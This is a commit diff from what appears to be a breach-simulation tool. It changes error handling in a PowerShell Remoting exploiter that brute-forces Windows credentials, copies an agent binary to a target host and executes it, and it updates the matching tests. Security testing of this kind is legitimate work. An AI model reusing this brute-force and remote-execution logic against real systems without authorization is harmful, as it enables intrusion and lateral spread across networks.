Agent: Improve handling of copy/execute errors in PowerShellExploiter

This commit is contained in:
Mike Salvatore 2022-03-14 10:15:33 -04:00 committed by Ilija Lazoroski
parent 4f0e690a7f
commit 7321eaf2c1
3 changed files with 56 additions and 38 deletions

View File

@ -34,6 +34,14 @@ class PowerShellRemotingDisabledError(Exception):
pass pass
class RemoteAgentCopyError(Exception):
pass
class RemoteAgentExecutionError(Exception):
pass
class PowerShellExploiter(HostExploiter): class PowerShellExploiter(HostExploiter):
_TARGET_OS_TYPE = ["windows"] _TARGET_OS_TYPE = ["windows"]
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
@ -48,6 +56,7 @@ class PowerShellExploiter(HostExploiter):
use_ssl = self._is_client_using_https() use_ssl = self._is_client_using_https()
except PowerShellRemotingDisabledError as e: except PowerShellRemotingDisabledError as e:
logging.info(e) logging.info(e)
# TODO: Set error message
return self.exploit_result return self.exploit_result
credentials = get_credentials( credentials = get_credentials(
@ -62,12 +71,18 @@ class PowerShellExploiter(HostExploiter):
self._client = self._authenticate_via_brute_force(credentials, auth_options) self._client = self._authenticate_via_brute_force(credentials, auth_options)
if not self._client: if not self._client:
# TODO: Set error message
return self.exploit_result return self.exploit_result
result_execution = self._execute_monkey_agent_on_victim() try:
self._execute_monkey_agent_on_victim()
self.exploit_result.exploitation_success = result_execution self.exploit_result.propagation_success = True
self.exploit_result.propagation_success = result_execution self.exploit_result.exploitation_success = True
except Exception as ex:
logger.error(f"Failed to propagate to the remote host: {ex}")
self.exploit_result.error_message = str(ex)
self.exploit_result.propagation_success = False
self.exploit_result.exploitation_success = False
return self.exploit_result return self.exploit_result
@ -109,6 +124,7 @@ class PowerShellExploiter(HostExploiter):
encryption=ENCRYPTION_AUTO, encryption=ENCRYPTION_AUTO,
ssl=use_ssl, ssl=use_ssl,
) )
# TODO: Report login attempt
PowerShellClient(self.host.ip_addr, credentials, auth_options) PowerShellClient(self.host.ip_addr, credentials, auth_options)
@ -116,9 +132,15 @@ class PowerShellExploiter(HostExploiter):
self, credentials: List[Credentials], auth_options: List[AuthOptions] self, credentials: List[Credentials], auth_options: List[AuthOptions]
) -> Optional[IPowerShellClient]: ) -> Optional[IPowerShellClient]:
for (creds, opts) in zip(credentials, auth_options): for (creds, opts) in zip(credentials, auth_options):
client = PowerShellClient(self.host.ip_addr, creds, opts) try:
if self._is_client_auth_valid(creds, client): client = PowerShellClient(self.host.ip_addr, creds, opts)
return client if self._is_client_auth_valid(creds, client):
return client
except Exception as ex:
logger.warning(
"An unexpected error occurred while trying to authenticate "
f"to {self.host.ip_addr}: {ex}"
)
return None return None
@ -152,41 +174,37 @@ class PowerShellExploiter(HostExploiter):
else: else:
raise ValueError(f"Unknown secret type {credentials.secret_type}") raise ValueError(f"Unknown secret type {credentials.secret_type}")
def _execute_monkey_agent_on_victim(self) -> bool: def _execute_monkey_agent_on_victim(self):
monkey_path_on_victim = self.options["dropper_target_path_win_64"] monkey_path_on_victim = self.options["dropper_target_path_win_64"]
is_monkey_copy_successful = self._copy_monkey_binary_to_victim(monkey_path_on_victim) self._copy_monkey_binary_to_victim(monkey_path_on_victim)
if is_monkey_copy_successful: logger.info("Successfully copied the monkey binary to the victim.")
logger.info("Successfully copied the monkey binary to the victim.")
self._run_monkey_executable_on_victim(monkey_path_on_victim)
else:
logger.error("Failed to copy the monkey binary to the victim.")
return False
return True
def _copy_monkey_binary_to_victim(self, monkey_path_on_victim) -> bool:
try: try:
self._create_local_agent_file() self._run_monkey_executable_on_victim(monkey_path_on_victim)
logger.info(f"Attempting to copy the monkey agent binary to {self.host.ip_addr}")
is_monkey_copy_successful = self._client.copy_file(
TEMP_MONKEY_BINARY_FILEPATH, monkey_path_on_victim
)
except Exception as ex: except Exception as ex:
raise ex raise RemoteAgentExecutionError(
f"Failed to execute the agent binary on the victim: {ex}"
)
def _copy_monkey_binary_to_victim(self, monkey_path_on_victim):
self._create_local_agent_file(TEMP_MONKEY_BINARY_FILEPATH)
try:
logger.info(f"Attempting to copy the monkey agent binary to {self.host.ip_addr}")
self._client.copy_file(TEMP_MONKEY_BINARY_FILEPATH, monkey_path_on_victim)
except Exception as ex:
raise RemoteAgentCopyError(f"Failed to copy the agent binary to the victim: {ex}")
finally: finally:
if os.path.isfile(TEMP_MONKEY_BINARY_FILEPATH): if os.path.isfile(TEMP_MONKEY_BINARY_FILEPATH):
os.remove(TEMP_MONKEY_BINARY_FILEPATH) os.remove(TEMP_MONKEY_BINARY_FILEPATH)
return is_monkey_copy_successful def _create_local_agent_file(self, binary_path):
def _create_local_agent_file(self):
agent_binary_bytes = self.agent_repository.get_agent_binary("windows") agent_binary_bytes = self.agent_repository.get_agent_binary("windows")
with open(TEMP_MONKEY_BINARY_FILEPATH, "wb") as f: with open(binary_path, "wb") as f:
f.write(agent_binary_bytes.getvalue()) f.write(agent_binary_bytes.getvalue())
def _run_monkey_executable_on_victim(self, executable_path) -> None: def _run_monkey_executable_on_victim(self, executable_path):
monkey_execution_command = build_monkey_execution_command( monkey_execution_command = build_monkey_execution_command(
self.host, get_monkey_depth() - 1, executable_path self.host, get_monkey_depth() - 1, executable_path
) )

View File

@ -87,16 +87,13 @@ class PowerShellClient(IPowerShellClient):
output, _, _ = self._client.execute_cmd(cmd) output, _, _ = self._client.execute_cmd(cmd)
return output return output
def copy_file(self, src: str, dest: str) -> bool: def copy_file(self, src: str, dest: str):
try: try:
self._client.copy(src, dest) self._client.copy(src, dest)
logger.debug(f"Successfully copied {src} to {dest} on {self._ip_addr}") logger.debug(f"Successfully copied {src} to {dest} on {self._ip_addr}")
return True
except Exception as ex: except Exception as ex:
logger.error(f"Failed to copy {src} to {dest} on {self._ip_addr}: {ex}") logger.error(f"Failed to copy {src} to {dest} on {self._ip_addr}: {ex}")
raise ex
return False
def execute_cmd_as_detached_process(self, cmd: str): def execute_cmd_as_detached_process(self, cmd: str):
logger.debug( logger.debug(

View File

@ -124,7 +124,7 @@ def test_successful_copy(monkeypatch, powershell_exploiter, powershell_arguments
def test_failed_copy(monkeypatch, powershell_exploiter, powershell_arguments): def test_failed_copy(monkeypatch, powershell_exploiter, powershell_arguments):
mock_client = MagicMock() mock_client = MagicMock()
mock_client.return_value.copy_file = MagicMock(return_value=False) mock_client.return_value.copy_file = MagicMock(side_effect=Exception("COPY FAILED"))
monkeypatch.setattr(powershell, "PowerShellClient", mock_client) monkeypatch.setattr(powershell, "PowerShellClient", mock_client)
@ -135,13 +135,16 @@ def test_failed_copy(monkeypatch, powershell_exploiter, powershell_arguments):
def test_failed_monkey_execution(monkeypatch, powershell_exploiter, powershell_arguments): def test_failed_monkey_execution(monkeypatch, powershell_exploiter, powershell_arguments):
mock_client = MagicMock() mock_client = MagicMock()
mock_client.copy_file = MagicMock(return_value=True) mock_client.copy_file = MagicMock(return_value=True)
mock_client.execute_cmd_as_detached_process = MagicMock(side_effect=Exception) mock_client.execute_cmd_as_detached_process = MagicMock(
side_effect=Exception("EXECUTION FAILED")
)
mock_powershell_client = MagicMock(side_effect=authenticate(mock_client)) mock_powershell_client = MagicMock(side_effect=authenticate(mock_client))
monkeypatch.setattr(powershell, "PowerShellClient", mock_powershell_client) monkeypatch.setattr(powershell, "PowerShellClient", mock_powershell_client)
exploit_result = powershell_exploiter.exploit_host(**powershell_arguments) exploit_result = powershell_exploiter.exploit_host(**powershell_arguments)
assert not exploit_result.exploitation_success # assert exploit_result.exploitation_success is True
assert exploit_result.propagation_success is False
def test_login_attemps_correctly_reported(monkeypatch, powershell_exploiter, powershell_arguments): def test_login_attemps_correctly_reported(monkeypatch, powershell_exploiter, powershell_arguments):